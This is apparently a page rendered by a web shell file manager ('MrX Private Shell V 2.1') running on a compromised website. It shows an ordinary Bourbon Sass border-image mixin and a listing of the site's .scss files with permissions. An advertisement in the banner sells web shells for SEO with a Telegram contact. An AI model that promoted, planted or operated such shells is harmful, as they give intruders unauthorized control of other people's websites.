__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@mixin border-image($borders...) {
@include _bourbon-deprecate-for-prefixing("border-image");
$webkit-borders: ();
$spec-borders: ();
@each $border in $borders {
$webkit-border: ();
$spec-border: ();
$border-type: type-of($border);
@if $border-type == string or list {
$border-str: if($border-type == list, nth($border, 1), $border);
$url-str: str-slice($border-str, 1, 3);
$gradient-type: str-slice($border-str, 1, 6);
@if $url-str == "url" {
$webkit-border: $border;
$spec-border: $border;
}
@else if $gradient-type == "linear" {
$gradients: _linear-gradient-parser("#{$border}");
$webkit-border: map-get($gradients, webkit-image);
$spec-border: map-get($gradients, spec-image);
}
@else if $gradient-type == "radial" {
$gradients: _radial-gradient-parser("#{$border}");
$webkit-border: map-get($gradients, webkit-image);
$spec-border: map-get($gradients, spec-image);
}
@else {
$webkit-border: $border;
$spec-border: $border;
}
}
@else {
$webkit-border: $border;
$spec-border: $border;
}
$webkit-borders: append($webkit-borders, $webkit-border, comma);
$spec-borders: append($spec-borders, $spec-border, comma);
}
-webkit-border-image: $webkit-borders;
border-image: $spec-borders;
border-style: solid;
}
//Examples:
// border-image: url("image.png");
// border-image: url("image.png") 20 stretch;
// border-image: linear-gradient(45deg, orange, yellow);
// border-image: linear-gradient(45deg, orange, yellow) stretch;
// border-image: linear-gradient(45deg, orange, yellow) 20 30 40 50 stretch round;
// border-image: radial-gradient(top, cover, orange, yellow, orange);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| _animation.scss | File | 2.06 KB | 0664 |
|
| _appearance.scss | File | 153 B | 0664 |
|
| _backface-visibility.scss | File | 181 B | 0664 |
|
| _background-image.scss | File | 1.37 KB | 0664 |
|
| _background.scss | File | 1.79 KB | 0664 |
|
| _border-image.scss | File | 1.79 KB | 0664 |
|
| _calc.scss | File | 163 B | 0664 |
|
| _columns.scss | File | 1.84 KB | 0664 |
|
| _filter.scss | File | 194 B | 0664 |
|
| _flex-box.scss | File | 8.71 KB | 0664 |
|
| _font-face.scss | File | 688 B | 0664 |
|
| _font-feature-settings.scss | File | 243 B | 0664 |
|
| _hidpi-media-query.scss | File | 518 B | 0664 |
|
| _hyphens.scss | File | 186 B | 0664 |
|
| _image-rendering.scss | File | 395 B | 0664 |
|
| _keyframes.scss | File | 1.19 KB | 0664 |
|
| _linear-gradient.scss | File | 1.34 KB | 0664 |
|
| _perspective.scss | File | 360 B | 0664 |
|
| _placeholder.scss | File | 248 B | 0664 |
|
| _radial-gradient.scss | File | 1.42 KB | 0664 |
|
| _selection.scss | File | 837 B | 0664 |
|
| _text-decoration.scss | File | 893 B | 0664 |
|
| _transform.scss | File | 691 B | 0664 |
|
| _transition.scss | File | 2.48 KB | 0664 |
|
| _user-select.scss | File | 160 B | 0664 |
|